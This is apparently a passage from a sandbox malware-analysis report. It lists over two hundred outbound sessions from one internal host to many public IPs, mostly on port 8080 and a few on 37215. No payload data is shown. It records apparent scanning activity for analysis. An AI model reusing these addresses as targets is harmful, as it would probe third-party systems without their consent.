                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13206192.168.2.2359086204.115.157.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13207192.168.2.235043888.94.246.388080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13208192.168.2.2337586137.37.242.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13209192.168.2.234461827.43.50.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13210192.168.2.2335688218.169.246.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13211192.168.2.2358332175.77.75.1818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13212192.168.2.235159698.110.202.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13213192.168.2.2334480168.124.2.318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13214192.168.2.2340470120.197.19.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13215192.168.2.235996890.91.223.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13216192.168.2.235909475.139.1.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13217192.168.2.2354854165.252.43.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13218192.168.2.235207897.220.42.2098080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13219192.168.2.234583812.68.132.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13220192.168.2.2351470194.188.116.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13221192.168.2.2345060158.51.46.598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13222192.168.2.2335442200.28.94.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13223192.168.2.236047698.238.205.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13224192.168.2.233604097.140.109.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13225192.168.2.235749697.192.85.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13226192.168.2.2339610128.110.206.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13227192.168.2.2360994207.206.243.2428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13228192.168.2.235144681.210.212.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13229192.168.2.234159891.1.101.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13230192.168.2.235445837.153.222.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13231192.168.2.233655640.227.38.68080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13232192.168.2.235479299.162.248.2288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13233192.168.2.234251670.211.58.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13234192.168.2.234918064.116.146.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13235192.168.2.234460212.223.255.1518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13236192.168.2.2337220122.169.247.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13237192.168.2.234212243.83.118.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13238192.168.2.2337468217.248.18.1358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13239192.168.2.234381054.18.59.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13240192.168.2.2334396218.58.6.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13241192.168.2.2341876180.17.20.608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13242192.168.2.2337916184.91.62.798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13243192.168.2.235108276.125.67.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13244192.168.2.2359952119.151.225.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13245192.168.2.2350032107.198.108.998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13246192.168.2.2340780220.87.163.2548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13247192.168.2.234258424.254.106.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13248192.168.2.2348274162.119.56.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13249192.168.2.2347070123.129.103.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13250192.168.2.2350480119.58.109.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13251192.168.2.234669096.65.178.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13252192.168.2.2358006148.69.12.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13253192.168.2.2350894158.246.80.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13254192.168.2.2342326113.182.164.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13255192.168.2.2356838195.0.58.2348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13256192.168.2.2353838104.228.201.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13257192.168.2.2346170115.129.236.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13258192.168.2.2335366178.37.59.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13259192.168.2.235378092.18.96.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13260192.168.2.2343174211.208.57.528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13261192.168.2.2348164135.73.216.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13262192.168.2.2336274169.54.239.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13263192.168.2.233404420.232.203.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13264192.168.2.233591880.90.60.1048080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13265192.168.2.2335032186.249.210.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13266192.168.2.234094413.163.41.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13267192.168.2.2342336112.181.134.708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13268192.168.2.233892473.120.193.2378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13269192.168.2.2340064107.57.121.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13270192.168.2.2348834217.227.100.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13271192.168.2.234466457.255.141.2418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13272192.168.2.235476419.47.176.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13273192.168.2.2348704203.72.82.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13274192.168.2.2349808161.118.208.1558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13275192.168.2.2338366166.227.215.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13276192.168.2.2333028222.169.51.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13277192.168.2.2350966144.23.37.1678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13278192.168.2.234732075.108.7.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13279192.168.2.233381084.189.0.2078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13280192.168.2.233573823.20.230.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13281192.168.2.2349326199.157.216.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13282192.168.2.2357080155.2.255.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13283192.168.2.235750636.124.236.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13284192.168.2.23547702.102.33.58080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13285192.168.2.2338320112.56.63.1348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13286192.168.2.2335778123.13.24.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13287192.168.2.2360870158.212.226.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13288192.168.2.234652286.163.126.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13289192.168.2.235538887.189.130.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13290192.168.2.2357692182.70.47.758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13291192.168.2.2350024176.199.188.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13292192.168.2.235632824.162.168.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13293192.168.2.2346458129.128.185.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13294192.168.2.235163885.24.249.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13295192.168.2.235107486.18.47.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13296192.168.2.2335086103.20.69.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13297192.168.2.234722274.155.237.2058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13298192.168.2.234368835.119.233.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13299192.168.2.234010220.133.56.1608080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13300192.168.2.2358350165.118.198.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13301192.168.2.2343140151.201.10.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13302192.168.2.2337458174.127.21.788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13303192.168.2.235048064.224.251.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13304192.168.2.236064898.233.172.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13305192.168.2.2345686193.24.133.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13306192.168.2.2335202184.81.142.1228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13307192.168.2.2334500130.105.49.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13308192.168.2.2354186118.78.221.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13309192.168.2.23366802.55.172.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13310192.168.2.2353940108.198.221.1078080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13311192.168.2.2357342191.90.151.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13312192.168.2.2343462126.247.171.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13313192.168.2.23581002.133.156.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13314192.168.2.235760047.144.86.2188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13315192.168.2.2350810222.43.69.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13316192.168.2.2349344167.115.137.2318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13317192.168.2.234760497.226.61.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13318192.168.2.2347490130.146.205.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13319192.168.2.2343976107.192.191.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13320192.168.2.2343564193.10.218.2028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13321192.168.2.2337058170.210.44.738080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13322192.168.2.234404072.133.92.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13323192.168.2.2360954153.170.212.1438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13324192.168.2.2348546201.60.14.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13325192.168.2.234185893.234.127.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13326192.168.2.2353280153.243.193.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13327192.168.2.2360072181.184.145.1978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13328192.168.2.234368437.18.245.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13329192.168.2.235405454.151.211.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13330192.168.2.2358738194.13.118.618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13331192.168.2.2343484107.61.143.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13332192.168.2.2359058128.208.243.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13333192.168.2.2344456126.51.160.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13334192.168.2.2349490126.202.42.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13335192.168.2.2350350108.10.55.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13336192.168.2.2340030157.248.174.17437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13337192.168.2.2345680197.24.102.6137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13338192.168.2.234281841.207.88.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13339192.168.2.2357886157.218.227.15237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13340192.168.2.235197276.215.194.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13341192.168.2.2351134160.2.152.2138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13342192.168.2.234548285.12.62.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13343192.168.2.2357090169.120.202.1938080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13344192.168.2.2335468208.248.175.838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13345192.168.2.2343080217.91.131.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13346192.168.2.2344566190.243.26.1208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13347192.168.2.2339142185.187.201.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13348192.168.2.2342438166.136.9.1778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13349192.168.2.234303631.83.214.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13350192.168.2.233809495.193.86.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13351192.168.2.235483639.18.115.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13352192.168.2.2346382153.34.217.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13353192.168.2.235615817.182.102.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13354192.168.2.2357170217.4.139.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13355192.168.2.2357672132.227.48.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13356192.168.2.234945413.115.158.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13357192.168.2.2333238126.6.115.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13358192.168.2.234056079.81.38.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13359192.168.2.234364067.216.179.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13360192.168.2.233380217.255.24.898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13361192.168.2.2348438184.155.143.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13362192.168.2.234930444.61.71.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13363192.168.2.2334112142.171.130.878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13364192.168.2.235008648.7.125.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13365192.168.2.2337880187.75.201.1658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13366192.168.2.234070285.94.150.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13367192.168.2.234003668.229.135.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13368192.168.2.233736219.203.144.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13369192.168.2.234477014.198.134.1368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13370192.168.2.235117066.85.123.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13371192.168.2.235428275.147.242.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13372192.168.2.234047669.163.178.2198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13373192.168.2.2339434147.165.146.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13374192.168.2.235524450.156.218.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13375192.168.2.233591297.211.53.1338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13376192.168.2.2359290128.226.217.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13377192.168.2.233476097.160.211.308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13378192.168.2.23498988.77.8.1058080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13379192.168.2.2347032152.105.170.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13380192.168.2.234531839.225.52.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13381192.168.2.2339546161.14.228.378080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13382192.168.2.2352756153.219.178.1028080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13383192.168.2.235140684.128.38.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13384192.168.2.2350072151.93.128.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13385192.168.2.23554041.215.143.1418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13386192.168.2.235657676.102.155.398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13387192.168.2.2357940126.175.108.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13388192.168.2.2344002160.102.215.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13389192.168.2.2340412201.250.86.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13390192.168.2.2342738139.55.43.278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13391192.168.2.2341418183.32.180.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13392192.168.2.2339692139.91.98.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13393192.168.2.2354206202.68.23.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13394192.168.2.2355714137.46.65.748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13395192.168.2.2356262116.54.78.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13396192.168.2.235252462.29.92.2018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13397192.168.2.2349764153.216.221.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13398192.168.2.2344976158.202.178.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13399192.168.2.2343762128.110.186.1598080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13400192.168.2.235015637.95.71.1968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13401192.168.2.234487696.13.8.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13402192.168.2.2343806194.248.18.1698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13403192.168.2.2355184213.56.187.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13404192.168.2.2335602165.121.11.448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13405192.168.2.2348290178.11.16.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13406192.168.2.2352832139.178.117.978080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13407192.168.2.234759614.177.14.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13408192.168.2.2349338107.176.201.818080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13409192.168.2.234673699.192.88.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13410192.168.2.235609475.146.9.1858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13411192.168.2.235017017.210.114.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13412192.168.2.2360220207.33.54.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13413192.168.2.235808638.32.0.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13414192.168.2.235037499.74.176.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13415192.168.2.2342660105.206.10.1688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
